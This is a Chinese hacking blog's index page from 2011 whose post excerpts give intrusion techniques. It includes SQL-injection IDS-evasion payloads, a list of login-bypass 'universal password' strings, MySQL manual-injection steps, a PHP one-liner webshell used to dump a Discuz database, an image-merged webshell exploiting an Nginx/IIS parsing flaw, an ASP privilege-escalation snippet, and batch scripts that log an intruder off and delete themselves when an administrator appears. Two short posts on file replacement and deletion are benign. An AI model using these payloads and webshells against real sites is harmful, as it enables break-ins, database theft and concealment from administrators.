WHaa_(T_T) - 博客园

2011年8月22日

摘要：当我们对一个运行IDS系统的服务器进行SQL注射时，我们往往会遇到很大的麻烦，因为我们的注射语句被过滤了，如何规避这种检测手段就成了一门新的技术，本文就对此规避技术提出十一条思路和方法，与大家商戳。一、运用编码技术绕过，如URLEncode编码，ASCII编码绕过。如or 1=1即%6f%72%20%31%3d%31Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)二、通过空格绕过，如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如or’swords’=‘swords’，由于mssql的松散性，我们可以把or ‘swords’之间的空格去掉阅读全文

posted @ 2011-08-22 00:32 WHaa_(T_T) 阅读(561) 评论(0) 推荐(0) 编辑

一句话专家模式”脱裤”

摘要：条件限制写不了大马，只有一个一句话，其实要实现什么完全够了，只是很不直观方便啊，比如tuo库。这儿利用的是马儿的专家模式（自己写代码）。ini_set(‘display_errors’, 1);set_time_limit(0);error_reporting(E_ALL);$connx = mysql_connect(“:/var/tmp/mysql.sock”, “forum”, “xx!!xx3″) or die(“Could not connect: ” . mysql_error());mysql_select_db(“discuz”,$connx) or die(“Could no 阅读全文

posted @ 2011-08-22 00:07 WHaa_(T_T) 阅读(160) 评论(0) 推荐(0) 编辑

2011年8月21日

C段时常用的批处理

摘要：检测管理员上线就注销自已：12345@echo off:checkchoice /C YN /T 10 /D Yquser find "#16" && del xx.bat logoffgoto check每次运行这个 bat 的时候先quser 一下，看当前的会话id 是多少，然后加1 每连接一次就会加1。以上适应使用管理员帐号时。下面适应使用拥有管理员权限的其他帐号：123@echo offlogoff 1del log.batlogoff后面的1改成自己登陆的ID号,用query user查看还有一个是防止嗅探过程中把服务器挂掉：12345678910 阅读全文

posted @ 2011-08-21 23:50 WHaa_(T_T) 阅读(296) 评论(0) 推荐(0) 编辑

2011年8月11日

高级SQL注入拿shell,一般黑客不知道。<哈客>

摘要：服务器只有一个站,又找不到注入点怎么办? 你可以试试在搜索框,登陆,任何框框里放个单引号,看看是否报错初级部分加个单引号',后面随便,随便填个密码,点击登陆典型的SQL注入判断权限: ' and user>0-- 明显的sa权限获取数据库名字: ' and db_name()>0-- 很容易获取到,数据库名,如果不是sa权限 ,比如public权限,我们可以通过差异备份获取shell,但本教程不必了下面开始高级部分:就不截图了,就是把下面代码放入登录框执行一:建表,3个字段';c... 阅读全文

posted @ 2011-08-11 14:43 WHaa_(T_T) 阅读(4639) 评论(0) 推荐(0) 编辑

2011年8月3日

万能密码

摘要： asp aspx万能密码1："or "a"="a2： ')or('a'='a3：or 1=1--4：'or 1=1--5：a'or' 1=1--6："or 1=1--7：'or'a'='a8："or"="a'='a9：'or''='10：'or'='or'11: 1 or '1'='1'=112: 1 or ' 阅读全文

posted @ 2011-08-03 01:57 WHaa_(T_T) 阅读(252) 评论(0) 推荐(0) 编辑

2011年8月2日

XP一个很无敌的命令

摘要：用来替换文件的replace，连正在使用的文件也能替换。非常无敌。比如：在C：\下建一个目录，c：\aaa 然后复制一首mp3到c:\aaa并命名为c:\aaa\a.mp3 然后再复制另一首歌到C:\a.mp3 然后用media player 播放c:\aaa\a.mp3在命令提示符下输入：replace c:\a.mp3 c:\aaa 过一会，是不是播放的歌已变为另一首。用这个命令来替换系统文件真是太爽了，并且XP的系统文件保护也对它无效。再也不用到安全模式下去替换文件了格式 REPLACE [drive1:][path1]filename [drive2:][path2] [/A] 阅读全文

posted @ 2011-08-02 22:41 WHaa_(T_T) 阅读(175) 评论(0) 推荐(0) 编辑

无法删除文件的删除命令

摘要： DEL /F /A /Q \\?\%1RD /S /Q \\?\%1另存为"统统删除.bat"然后，要把要删除的文件或者目录拖放到这个bat文件的图标上就可以删除了。万事OK，不信大家试试啊。有了这个，还要其它辅助软件干什么。呵呵阅读全文

posted @ 2011-08-02 22:28 WHaa_(T_T) 阅读(175) 评论(0) 推荐(0) 编辑

无wscript.shell组件提权又一个方法

摘要：代码:<object runat=server id=oScriptlhn scope=pageclassid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object><%if err then%><object runat=server id=oScriptlhn scope=pageclassid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object><%end ifrespons 阅读全文

posted @ 2011-08-02 22:22 WHaa_(T_T) 阅读(361) 评论(0) 推荐(0) 编辑

2011年7月19日

Nginx那个0day,IIS7.0的畸形解析和这个类似。

摘要： Nginx那个0day（出来有几天了，因为介绍的网站很多，所以当时就没转载）先合并一张PHP一句话图片马，合并方法：①、DOS合并：copy1.gif/b+1.txt/aasp.gif②、用edjpgcom，进行图片和一句话木马的合并，一句话代码为"<?fputs(fopen("shell.PHP","w"),"<?eval(\$_POST[akt]);?>")?>"图片随便找一张.一句话:<?phpfputs(fopen('shell.php','w' 阅读全文

posted @ 2011-07-19 05:48 WHaa_(T_T) 阅读(357) 评论(0) 推荐(0) 编辑

2011年6月27日

MySql 手工注入实战

摘要： 1.如何判断权限是否为rootand ord(mid(user(),1,1))=114 返回正常即为ROOT权限,2.注入点只有一个地方显示数据,如何查询多条数据假设这个注入点只有3 如何显示多条数据?使用concat函数。格式concat(user(),database(),version(),@@datadir)root@localhosthyxy5.1.40-communityC:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\ 这样不好看? 可以自己加个空格oot@loca 阅读全文

posted @ 2011-06-27 18:43 WHaa_(T_T) 阅读(738) 评论(0) 推荐(0) 编辑

T_T

公告